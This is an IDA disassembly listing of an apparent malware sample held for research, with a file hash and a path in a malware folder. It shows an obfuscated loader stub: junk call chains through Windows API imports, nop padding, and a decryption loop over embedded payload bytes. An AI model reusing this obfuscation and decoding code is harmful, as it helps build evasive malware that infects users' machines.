;
; +-------------------------------------------------------------------------+
; |   This file	has been generated by The Interactive Disassembler (IDA)    |
; |	   Copyright (c) 2010 by Hex-Rays, <support@hex-rays.com>	    |
; |			 License info: 48-B231-7414-99			    |
; |		       NCFTA Canada/Concordia University		    |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; |   This file	has been generated by The Interactive Disassembler (IDA)    |
; |	   Copyright (c) 2010 by Hex-Rays, <support@hex-rays.com>	    |
; |			 License info: 48-B231-7414-99			    |
; |		       NCFTA Canada/Concordia University		    |
; +-------------------------------------------------------------------------+
;
; Input	MD5   :	0D318F819BE1A77A1ADDFD06A01046C3
; Input	CRC32 :	1E3D2AAB

; File Name   :	C:\Users\farhadi\Desktop\509_Malware\0d318f819be1a77a1addfd06a01046c3
; Format      :	Portable executable for	80386 (PE)
; Imagebase   :	400000
; Section 1. (virtual address 00001000)
; Virtual size			: 000017C8 (   6088.)
; Section size in file		: 00001800 (   6144.)
; Offset to raw	data for section: 0004E400
; Flags	60000020: Text Executable Readable
; Alignment	: default

		include	uni.inc	; see unicode subdir of	ida for	info on	unicode

		.686p
		.mmx
		.model flat

; ===========================================================================

; Segment type:	Pure code
; Segment permissions: Read/Execute
_text		segment	para public 'CODE' use32
		assume cs:_text
		;org 401000h
		assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
		db 90h dup(90h)

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame

sub_401090	proc near		; CODE XREF: sub_401A64+15p
		mov	edi, edi
		push	ebp
		mov	ebp, esp
		sub	esp, 20h
		lea	edx, asc_4BA024	; "					  "...
		and	dword ptr [edx+0C0h], 74C1h
		push	edx
		mov	ebx, 0
		push	ebx
		rep call sub_4010BC
		mov	eax, ds:UnmapViewOfFile
		jmp	eax
sub_401090	endp


; =============== S U B	R O U T	I N E =======================================


sub_4010BC	proc near		; CODE XREF: sub_401090+1Fp
		pop	ecx
		call	ecx
		pop	edx
		push	edx
		push	ecx
		push	dword ptr [edx+0C4h]
		push	dword ptr [edx+368h]
		call	sub_401188
		add	esp, 0Ch
		pop	edx
		push	edx

loc_4010D8:				; CODE XREF: sub_4010E9+5j
		lea	edx, [edx-24h]
		push	edx
		rep call sub_4010E9
		mov	eax, ds:GetModuleHandleA
		jmp	eax
sub_4010BC	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================


sub_4010E9	proc near		; CODE XREF: sub_4010BC+20p
		pop	ecx
		call	ecx
		test	eax, eax
		jnz	short loc_4010D8
		pop	edx
		add	esp, 20h
		pop	ebp
		retn	0
sub_4010E9	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame

sub_4010F8	proc near		; CODE XREF: start+43j
		mov	edi, edi
		push	ebp
		mov	ebp, esp
		sub	esp, 2Ch
		mov	eax, offset dword_4BA3A0
		sub	[eax-28h], edi
		push	eax
		mov	ebx, 0
		push	ebx
		rep call sub_40111C
		mov	eax, ds:UnmapViewOfFile
		jmp	eax
sub_4010F8	endp


; =============== S U B	R O U T	I N E =======================================


sub_40111C	proc near		; CODE XREF: sub_4010F8+17p
		pop	ecx
		call	ecx
		pop	eax
		push	eax
		push	dword ptr [eax+22Ch]
		push	ecx
		push	dword ptr [eax+2FCh]
		push	dword ptr [eax+3D8h]
		call	sub_4011DC
		add	esp, 10h
		pop	eax
		mov	esi, offset GetModuleHandleA
		mov	esi, [esi]
		push	esi
		push	dword ptr [eax-94h]
		pop	esi
		call	esi
		add	esp, 2Ch
		pop	ebp
		retn	0
sub_40111C	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		db 33h dup(90h)

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame

sub_401188	proc near		; CODE XREF: sub_4010BC+12p
		mov	edi, edi
		push	ebp
		mov	ebp, esp
		sub	esp, 58h
		lea	ebx, dword_4BA29C
		and	eax, [ebx+15Ch]
		push	0
		rep call sub_4011AB
		mov	eax, ds:IsWindow
		jmp	eax
sub_401188	endp


; =============== S U B	R O U T	I N E =======================================


sub_4011AB	proc near		; CODE XREF: sub_401188+16p
		pop	ecx
		call	ecx
		push	ebx
		push	edi
		push	dword ptr [ebx+1A8h]
		call	sub_401570
		add	esp, 8
		pop	ebx
		mov	edi, 0
		push	edi
		rep call sub_4011D2
		mov	eax, ds:SetEvent
		jmp	eax
sub_4011AB	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================


sub_4011D2	proc near		; CODE XREF: sub_4011AB+1Ap
		pop	ecx
		call	ecx
		add	esp, 58h
		pop	ebp
		retn	0
sub_4011D2	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame

sub_4011DC	proc near		; CODE XREF: sub_40111C+18p
		mov	edi, edi
		push	ebp

loc_4011DF:				; CODE XREF: sub_4011DC+11j
		mov	ebp, esp
		sub	esp, 34h
		lea	edi, [eax+4Ch]
		cmp	edi, 768h
		jz	short loc_4011DF
		push	0
		rep call sub_4011FE
		mov	eax, ds:IsWindow
		jmp	eax
sub_4011DC	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================


sub_4011FE	proc near		; CODE XREF: sub_4011DC+15p
		pop	ecx
		call	ecx
		push	edi
		push	ecx
		push	ebx
		call	sub_40133C
		add	esp, 8
		pop	edi
		rep call sub_40121A
		mov	eax, ds:GetTickCount
		jmp	eax
sub_4011FE	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================


sub_40121A	proc near		; CODE XREF: sub_4011FE+Fp
		pop	ecx
		call	ecx
		add	esp, 34h
		pop	ebp
		retn	0
sub_40121A	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame

sub_401224	proc near		; CODE XREF: sub_401FEC+Ep
		mov	edi, edi
		push	ebp
		mov	ebp, esp
		sub	esp, 20h
		lea	esi, [ecx-38h]
		sbb	eax, edx
		push	0
		rep call sub_401240
		mov	eax, ds:UnmapViewOfFile
		jmp	eax
sub_401224	endp


; =============== S U B	R O U T	I N E =======================================


sub_401240	proc near		; CODE XREF: sub_401224+Fp
		pop	ecx
		call	ecx
		push	esi
		push	dword ptr [esi+39Ch]
		push	dword ptr [esi+0A0h]
		push	dword ptr [esi+0DCh]
		push	eax
		call	sub_4018E4
		add	esp, 10h
		pop	esi
		push	0
		rep call sub_40126F
		mov	eax, ds:UnmapViewOfFile
		jmp	eax
sub_401240	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================


sub_40126F	proc near		; CODE XREF: sub_401240+22p
		pop	ecx
		call	ecx
		add	esp, 20h
		pop	ebp
		retn	0
sub_40126F	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		db 0C3h	dup(90h)

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame

sub_40133C	proc near		; CODE XREF: sub_4011FE+6p
		mov	edi, edi
		push	ebp

loc_40133F:				; CODE XREF: sub_40133C+14j
		mov	ebp, esp
		sub	esp, 34h
		lea	ebx, dword_4BA330
		cmp	ebx, 2FBEh
		jb	short loc_40133F
		push	ebx
		push	eax
		push	edi
		push	ecx
		push	edx
		call	sub_401450
		add	esp, 10h
		pop	ebx
		mov	esi, 0
		push	esi
		rep call sub_401373
		mov	eax, ds:lstrlenA
		jmp	eax
sub_40133C	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================


sub_401373	proc near		; CODE XREF: sub_40133C+2Ap
		pop	ecx
		call	ecx
		rep call sub_401383
		mov	eax, ds:GetTickCount
		jmp	eax
sub_401373	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================


sub_401383	proc near		; CODE XREF: sub_401373+3p
		pop	ecx
		call	ecx
		add	esp, 34h
		pop	ebp
		retn	0
sub_401383	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		db 0C3h	dup(90h)

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame

sub_401450	proc near		; CODE XREF: sub_40133C+1Bp
		mov	edi, edi
		push	ebp
		mov	ebp, esp
		sub	esp, 20h
		mov	eax, 4BA054h
		mov	[eax+1B8h], ebx
		push	eax
		push	dword ptr [eax+2BCh]
		push	dword ptr [eax+260h]
		push	dword ptr [eax+84h]
		push	dword ptr [eax+368h]
		call	sub_401F74
		add	esp, 10h
		pop	eax
		push	eax
		mov	edx, 0
		push	edx
		rep call sub_401499
		mov	eax, ds:CloseHandle
		jmp	eax
sub_401450	endp


; =============== S U B	R O U T	I N E =======================================


sub_401499	proc near		; CODE XREF: sub_401450+3Cp
		pop	ecx
		call	ecx
		pop	eax
		push	eax
		mov	ecx, 0
		push	ecx
		rep call sub_4014B1
		mov	eax, ds:SetEvent
		jmp	eax
sub_401499	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================


sub_4014B1	proc near		; CODE XREF: sub_401499+Bp
		pop	ecx
		call	ecx
		pop	eax
		add	esp, 20h
		pop	ebp
		retn	0
sub_4014B1	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame

sub_4014BC	proc near		; CODE XREF: sub_4018E4+27p

var_28		= dword	ptr -28h

		mov	edi, edi
		push	ebp
		mov	ebp, esp
		sub	esp, 3Ch
		mov	edx, offset dword_4BA2E0
		sbb	[ebp+var_28], ebx
		push	edx
		push	dword ptr [edx+2D0h]
		push	ecx
		push	ebx
		call	sub_401770
		add	esp, 0Ch
		pop	edx
		push	edx
		mov	ecx, 0
		push	ecx
		rep call sub_4014F2
		mov	eax, ds:SetLastError
		jmp	eax
sub_4014BC	endp


; =============== S U B	R O U T	I N E =======================================


sub_4014F2	proc near		; CODE XREF: sub_4014BC+29p
		pop	ecx
		call	ecx
		pop	edx
		push	edx
		rep call sub_401504
		mov	eax, ds:GetCommandLineW
		jmp	eax
sub_4014F2	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================


sub_401504	proc near		; CODE XREF: sub_4014F2+5p
		pop	ecx
		call	ecx
		pop	edx
		add	esp, 3Ch
		pop	ebp
		retn	0
sub_401504	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		db 61h dup(90h)

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame

sub_401570	proc near		; CODE XREF: sub_4011AB+Bp
		mov	edi, edi
		push	ebp
		mov	ebp, esp
		sub	esp, 4Ch
		lea	esi, dword_4BA1F8
		mov	dword ptr [esi+7Ch], 0FFFFA496h
		push	esi
		push	dword ptr [esi+20Ch]
		push	dword ptr [esi+1B0h]
		call	sub_401714
		add	esp, 8
		pop	esi
		lea	edx, [esi-1F8h]	; CODE XREF: sub_4015AF+5j
		push	edx
		rep call sub_4015AF
		mov	eax, ds:GetModuleHandleA
		jmp	eax
sub_401570	endp


; =============== S U B	R O U T	I N E =======================================


sub_4015AF	proc near		; CODE XREF: sub_401570+32p
		pop	ecx
		call	ecx
		test	eax, eax
		jnz	short near ptr loc_40159B+1
		rep call sub_4015C3
		mov	eax, ds:GetTickCount
		jmp	eax
sub_4015AF	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================


sub_4015C3	proc near		; CODE XREF: sub_4015AF+7p
		pop	ecx
		call	ecx
		add	esp, 4Ch
		pop	ebp
		retn	0
sub_4015C3	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		db 63h dup(90h)

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame

sub_401630	proc near		; CODE XREF: sub_401770+21p
		mov	edi, edi
		push	ebp
		mov	ebp, esp
		sub	esp, 60h
		mov	ecx, offset dword_4BA39C
		add	edx, 5
		push	ecx
		push	dword ptr [ecx+0D8h]
		push	dword ptr [ecx+190h]
		push	dword ptr [ecx+29Ch]
		call	sub_401D78
		add	esp, 0Ch
		pop	ecx
		push	ecx
		push	0
		rep call sub_40166C
		mov	eax, ds:IsWindow
		jmp	eax
sub_401630	endp


; =============== S U B	R O U T	I N E =======================================


sub_40166C	proc near		; CODE XREF: sub_401630+2Fp
		pop	ecx
		call	ecx
		pop	ecx
		push	ecx
		mov	edi, 0
		push	edi
		rep call sub_401684
		mov	eax, ds:LocalUnlock
		jmp	eax
sub_40166C	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================


sub_401684	proc near		; CODE XREF: sub_40166C+Bp
		pop	ecx
		call	ecx
		pop	ecx
		add	esp, 60h
		pop	ebp
		retn	0
sub_401684	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame

sub_401690	proc near		; CODE XREF: sub_401A04+26p
		mov	edi, edi
		push	ebp
		mov	ebp, esp
		sub	esp, 50h
		lea	edi, [ebx+30h]
		and	ecx, 58h
		push	edi
		push	dword ptr [edi+1F8h]
		push	dword ptr [edi+1B8h]
		call	sub_401FC8
		add	esp, 8
		pop	edi
		mov	edx, 0
		push	edx
		rep call sub_4016C7
		mov	eax, ds:CloseHandle
		jmp	eax
sub_401690	endp


; =============== S U B	R O U T	I N E =======================================


sub_4016C7	proc near		; CODE XREF: sub_401690+2Ap
		pop	ecx
		call	ecx
		push	0
		rep call sub_4016D9
		mov	eax, ds:GetDC
		jmp	eax
sub_4016C7	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================


sub_4016D9	proc near		; CODE XREF: sub_4016C7+5p
		pop	ecx
		call	ecx
		add	esp, 50h
		pop	ebp
		retn	0
sub_4016D9	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		db 31h dup(90h)

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame

sub_401714	proc near		; CODE XREF: sub_401570+22p
		mov	edi, edi
		push	ebp
		mov	ebp, esp
		sub	esp, 50h
		mov	ecx, 4BA08Ch
		mov	ebx, [ecx+254h]
		push	ecx
		push	0
		rep call sub_401737
		mov	eax, ds:LocalUnlock
		jmp	eax
sub_401714	endp


; =============== S U B	R O U T	I N E =======================================


sub_401737	proc near		; CODE XREF: sub_401714+16p
		pop	ecx
		call	ecx
		pop	ecx
		push	ecx
		push	dword ptr [ecx+354h]
		push	dword ptr [ecx+2ACh]
		push	eax
		call	sub_401AB4
		add	esp, 0Ch
		pop	ecx
		push	ecx
		push	0
		rep call sub_401762
		mov	eax, ds:LocalFree
		jmp	eax
sub_401737	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================


sub_401762	proc near		; CODE XREF: sub_401737+1Ep
		pop	ecx
		call	ecx
		pop	ecx
		add	esp, 50h
		pop	ebp
		retn	0
sub_401762	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		align 10h

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame

sub_401770	proc near		; CODE XREF: sub_4014BC+19p
		mov	edi, edi
		push	ebp
		mov	ebp, esp
		sub	esp, 40h
		lea	eax, [edx-0E0h]
		add	dword ptr [eax+3Ch], 5Fh
		push	eax
		push	dword ptr [eax+20Ch]
		push	dword ptr [eax+368h]
		push	edx
		push	ebx
		call	sub_401630
		add	esp, 10h
		pop	eax
		push	eax

loc_40179B:				; CODE XREF: sub_4017AF+5j
		lea	eax, [eax-200h]
		push	eax
		rep call sub_4017AF
		mov	eax, ds:GetModuleHandleA
		jmp	eax
sub_401770	endp


; =============== S U B	R O U T	I N E =======================================


sub_4017AF	proc near		; CODE XREF: sub_401770+32p
		pop	ecx
		call	ecx
		test	eax, eax
		jnz	short loc_40179B
		pop	eax
		push	eax
		mov	edi, 0
		push	edi
		rep call sub_4017CB
		mov	eax, ds:SetEvent
		jmp	eax
sub_4017AF	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================


sub_4017CB	proc near		; CODE XREF: sub_4017AF+Fp
		pop	ecx
		call	ecx
		pop	eax
		add	esp, 40h
		pop	ebp
		retn	0
sub_4017CB	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		align 4

; =============== S U B	R O U T	I N E =======================================


		public start
start		proc near

var_4		= dword	ptr -4

		mov	ecx, offset lstrlenA
		push	0
		pop	eax
		nop
		nop
		nop
		nop
		call	ds:GetConsoleTitleA
		add	esp, 0FFFFFFF8h
		xor	eax, eax
		lea	eax, ds:4BA100h[eax*4]
		lea	ecx, [eax+0Ch]
		add	byte ptr [ecx],	4
		push	eax		; lpLibFileName
		call	ds:LoadLibraryW
		push	3Ch
		add	[esp+4+var_4], eax
		pop	ecx
		mov	ecx, [ecx]
		sub	ecx, 0FFFFFFAFh
		mov	eax, [eax+ecx]
		shr	eax, 4
		mov	cl, 25h
		cmp	al, cl
		pusha
		jg	short loc_401820
		jmp	sub_4010F8
; ---------------------------------------------------------------------------

loc_401820:				; CODE XREF: start+41j
		popa
		call	dword ptr [esp+0]
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
		nop
start		endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame

sub_4018E4	proc near		; CODE XREF: sub_401240+17p
		mov	edi, edi
		push	ebp
		mov	ebp, esp
		sub	esp, 38h
		mov	edi, offset dword_4BA158
		xor	[edi-0CCh], edi
		push	edi
		push	dword ptr [edi+3F4h]
		push	dword ptr [edi+0BCh]
		push	esi
		push	dword ptr [edi+374h]
		call	sub_4014BC
		add	esp, 10h
		pop	edi
		push	0
		rep call sub_401923
		mov	eax, ds:SetLastError
		jmp	eax
sub_4018E4	endp


; =============== S U B	R O U T	I N E =======================================


sub_401923	proc near		; CODE XREF: sub_4018E4+32p
		pop	ecx
		call	ecx
		mov	ebx, 0
		push	ebx
		rep call sub_401939
		mov	eax, ds:UnmapViewOfFile
		jmp	eax
sub_401923	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================


sub_401939	proc near		; CODE XREF: sub_401923+9p
		pop	ecx
		call	ecx
		add	esp, 38h
		pop	ebp
		retn	0
sub_401939	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		db 0C1h	dup(90h)

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame

sub_401A04	proc near		; CODE XREF: sub_401F74+1Cp
		mov	edi, edi
		push	ebp
		mov	ebp, esp
		sub	esp, 20h
		lea	ebx, dword_4BA010
		xor	dword ptr [ebx+3BCh], 0FFFFAEBDh
		push	ebx
		push	dword ptr [ebx+170h]
		push	dword ptr [ebx+190h]
		push	eax
		call	sub_401690
		add	esp, 0Ch
		pop	ebx
		push	0
		rep call sub_401A42
		mov	eax, ds:UnmapViewOfFile
		jmp	eax
sub_401A04	endp


; =============== S U B	R O U T	I N E =======================================


sub_401A42	proc near		; CODE XREF: sub_401A04+31p
		pop	ecx
		call	ecx
		mov	edx, 0
		push	edx
		rep call sub_401A58
		mov	eax, ds:SetEvent
		jmp	eax
sub_401A42	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================


sub_401A58	proc near		; CODE XREF: sub_401A42+9p
		pop	ecx
		call	ecx
		add	esp, 20h
		pop	ebp
		retn	0
sub_401A58	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		align 4

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame

sub_401A64	proc near		; CODE XREF: sub_401C6F+6p

var_20		= dword	ptr -20h

		mov	edi, edi
		push	ebp
		mov	ebp, esp
		sub	esp, 44h
		lea	eax, asc_4BA024+98h
		add	[ebp+var_20], 4Bh
		push	eax
		push	esi
		push	esi
		call	sub_401090
		add	esp, 8
		pop	eax
		push	eax
		push	0
		rep call sub_401A92
		mov	eax, ds:GetDC
		jmp	eax
sub_401A64	endp


; =============== S U B	R O U T	I N E =======================================


sub_401A92	proc near		; CODE XREF: sub_401A64+21p
		pop	ecx
		call	ecx
		pop	eax
		push	eax
		push	0
		rep call sub_401AA6
		mov	eax, ds:lstrlenA
		jmp	eax
sub_401A92	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================


sub_401AA6	proc near		; CODE XREF: sub_401A92+7p
		pop	ecx
		call	ecx
		pop	eax
		add	esp, 44h
		pop	ebp
		retn	0
sub_401AA6	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		align 4

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame

sub_401AB4	proc near		; CODE XREF: sub_401737+12p
		mov	edi, edi
		push	ebp
		mov	ebp, esp
		sub	esp, 58h
		lea	esi, [ecx+0E8h]
		sbb	edi, [esi+0DCh]
		push	esi
		push	edi
		push	eax
		push	dword ptr [esi+54h]
		call	sub_402050
		add	esp, 0Ch
		pop	esi
		rep call sub_401AE4
		mov	eax, ds:GetCommandLineW
		jmp	eax
sub_401AB4	endp


; =============== S U B	R O U T	I N E =======================================


sub_401AE4	proc near		; CODE XREF: sub_401AB4+23p
		pop	ecx
		call	ecx
		rep call sub_401AF4
		mov	eax, ds:GetTickCount
		jmp	eax
sub_401AE4	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================


sub_401AF4	proc near		; CODE XREF: sub_401AE4+3p
		pop	ecx
		call	ecx
		add	esp, 58h
		pop	ebp
		retn	0
sub_401AF4	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		db 32h dup(90h)

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame

sub_401B30	proc near		; CODE XREF: sub_402079+7p
		mov	edi, edi
		push	ebp
		mov	ebp, esp
		sub	esp, 1Ch
		lea	ecx, dword_4BA138
		sub	esi, 0FFFFFFC0h
		push	ecx

loc_401B42:				; CODE XREF: sub_401B56+5j
		lea	ebx, [ecx-138h]
		push	ebx
		rep call sub_401B56
		mov	eax, ds:GetModuleHandleA
		jmp	eax
sub_401B30	endp


; =============== S U B	R O U T	I N E =======================================


sub_401B56	proc near		; CODE XREF: sub_401B30+19p
		pop	ecx
		call	ecx
		test	eax, eax
		jnz	short loc_401B42
		pop	ecx
		push	ecx
		push	esi
		push	dword ptr [ecx+230h]
		push	eax
		push	dword ptr [ecx+30h]
		call	sub_401B94
		add	esp, 10h
		pop	ecx
		push	ecx
		mov	ecx, 0
		push	ecx
		rep call sub_401B87
		mov	eax, ds:GetDC
		jmp	eax
sub_401B56	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================


sub_401B87	proc near		; CODE XREF: sub_401B56+24p
		pop	ecx
		call	ecx
		pop	ecx
		add	esp, 1Ch
		pop	ebp
		retn	0
sub_401B87	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		align 4

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame

sub_401B94	proc near		; CODE XREF: sub_401B56+14p

var_8		= dword	ptr -8

		mov	edi, edi
		push	ebp
		mov	ebp, esp
		sub	esp, 30h
		mov	edi, offset dword_4BA394
		xor	[ebp+var_8], edi
		push	0
		rep call sub_401BB3
		mov	eax, ds:CloseHandle
		jmp	eax
sub_401B94	endp


; =============== S U B	R O U T	I N E =======================================


sub_401BB3	proc near		; CODE XREF: sub_401B94+12p
		pop	ecx
		call	ecx
		push	edi
		push	dword ptr [edi+2E0h]
		push	dword ptr [edi+0C4h]
		push	edx
		call	sub_401C9C
		add	esp, 0Ch
		pop	edi
		mov	edx, 0
		push	edx
		rep call sub_401BE0
		mov	eax, ds:GetDC
		jmp	eax
sub_401BB3	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================


sub_401BE0	proc near		; CODE XREF: sub_401BB3+20p
		pop	ecx
		call	ecx
		add	esp, 30h
		pop	ebp
		retn	0
sub_401BE0	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		db 62h dup(90h)

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame

sub_401C4C	proc near		; CODE XREF: sub_401D78+14p

var_20		= dword	ptr -20h

		mov	edi, edi
		push	ebp
		mov	ebp, esp
		sub	esp, 2Ch
		mov	edi, 4BA0B8h
		sub	[ebp+var_20], ecx
		mov	eax, 0
		push	eax
		rep call sub_401C6F
		mov	eax, ds:SetLastError
		jmp	eax
sub_401C4C	endp


; =============== S U B	R O U T	I N E =======================================


sub_401C6F	proc near		; CODE XREF: sub_401C4C+16p
		pop	ecx
		call	ecx
		push	edi
		push	esi
		push	eax
		call	sub_401A64
		add	esp, 8
		pop	edi
		mov	eax, 0
		push	eax
		rep call sub_401C91
		mov	eax, ds:UnmapViewOfFile
		jmp	eax
sub_401C6F	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================


sub_401C91	proc near		; CODE XREF: sub_401C6F+15p
		pop	ecx
		call	ecx
		add	esp, 2Ch
		pop	ebp
		retn	0
sub_401C91	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		align 4

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame

sub_401C9C	proc near		; CODE XREF: sub_401BB3+11p

var_3C		= dword	ptr -3Ch

		mov	edi, edi
		push	ebp
		mov	ebp, esp
		sub	esp, 2Ch
		sub	edx, eax
		mov	esi, offset dword_4BA2A8
		mov	edx, 6B4h
		push	edx
		mov	ecx, 6B4h
		push	ecx
		mov	ecx, 40001h
		push	ecx
		mov	ecx, 0B9C59E01h
		push	dword ptr [ecx+467A9213h]
		sub	[esp+3Ch+var_3C], 2
		mov	ecx, offset LoadLibraryW
		pop	dword ptr [ecx]
		rep call sub_401CE0
		mov	eax, ds:LoadLibraryW
		jmp	eax
sub_401C9C	endp


; =============== S U B	R O U T	I N E =======================================


sub_401CE0	proc near		; CODE XREF: sub_401C9C+37p
		pop	ecx
		call	ecx
		push	eax
		pop	dword ptr [esi+64h]
		mov	ecx, [esi+64h]
		mov	eax, ecx
		sub	edi, edi
		dec	edi
		and	edi, offset word_402106
		mov	ebx, 22419A76h
		push	dword ptr [edi]
		pop	dword ptr [eax]
		add	edi, 1
		add	eax, 1
		xor	ecx, ecx

loc_401D06:				; CODE XREF: sub_401CE0+48j
		xor	edx, edx
		push	dword ptr [edi]
		adc	[esp+0], ebx
		pop	dword ptr [eax+edx*2]
		sub	ebx, ebx
		sbb	ebx, [edi+ebx*4]
		neg	ebx
		shr	ebx, 1
		add	edi, 4
		add	eax, 4
		add	ecx, 4
		cmp	ecx, 6B4h
		jnz	short loc_401D06
		mov	edx, 0
		push	edx
		rep call sub_401D3D
		mov	eax, ds:PulseEvent
		jmp	eax
sub_401CE0	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================


sub_401D3D	proc near		; CODE XREF: sub_401CE0+50p
		pop	ecx
		call	ecx
		add	esp, 2Ch
		pop	ebp
		retn	0
sub_401D3D	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		db 31h dup(90h)

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame

sub_401D78	proc near		; CODE XREF: sub_401630+23p
		mov	edi, edi
		push	ebp
		mov	ebp, esp
		sub	esp, 5Ch
		lea	ebx, [ecx-1CCh]
		adc	edi, 0FFFFFFE7h
		push	ebx
		push	eax
		push	esi
		call	sub_401C4C
		add	esp, 8
		pop	ebx
		mov	edi, 0
		push	edi
		rep call sub_401DA8
		mov	eax, ds:LocalFree
		jmp	eax
sub_401D78	endp


; =============== S U B	R O U T	I N E =======================================


sub_401DA8	proc near		; CODE XREF: sub_401D78+23p
		pop	ecx
		call	ecx
		push	0
		rep call sub_401DBA
		mov	eax, ds:Sleep
		jmp	eax
sub_401DA8	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================


sub_401DBA	proc near		; CODE XREF: sub_401DA8+5p
		pop	ecx
		call	ecx
		add	esp, 5Ch
		pop	ebp
		retn	0
sub_401DBA	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		db 1B0h	dup(90h)

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame

sub_401F74	proc near		; CODE XREF: sub_401450+2Cp
		mov	edi, edi
		push	ebp
		mov	ebp, esp
		sub	esp, 3Ch
		lea	ecx, [eax+2FCh]
		and	esi, eax
		push	ecx
		push	edx
		push	dword ptr [ecx+18h]
		push	edi
		push	dword ptr [ecx+380h]
		call	sub_401A04
		add	esp, 10h
		pop	ecx
		push	ecx
		push	0
		rep call sub_401FA9
		mov	eax, ds:LocalFree
		jmp	eax
sub_401F74	endp


; =============== S U B	R O U T	I N E =======================================


sub_401FA9	proc near		; CODE XREF: sub_401F74+28p
		pop	ecx
		call	ecx
		pop	ecx
		push	ecx
		push	0
		rep call sub_401FBD
		mov	eax, ds:LocalUnlock
		jmp	eax
sub_401FA9	endp ; sp-analysis failed


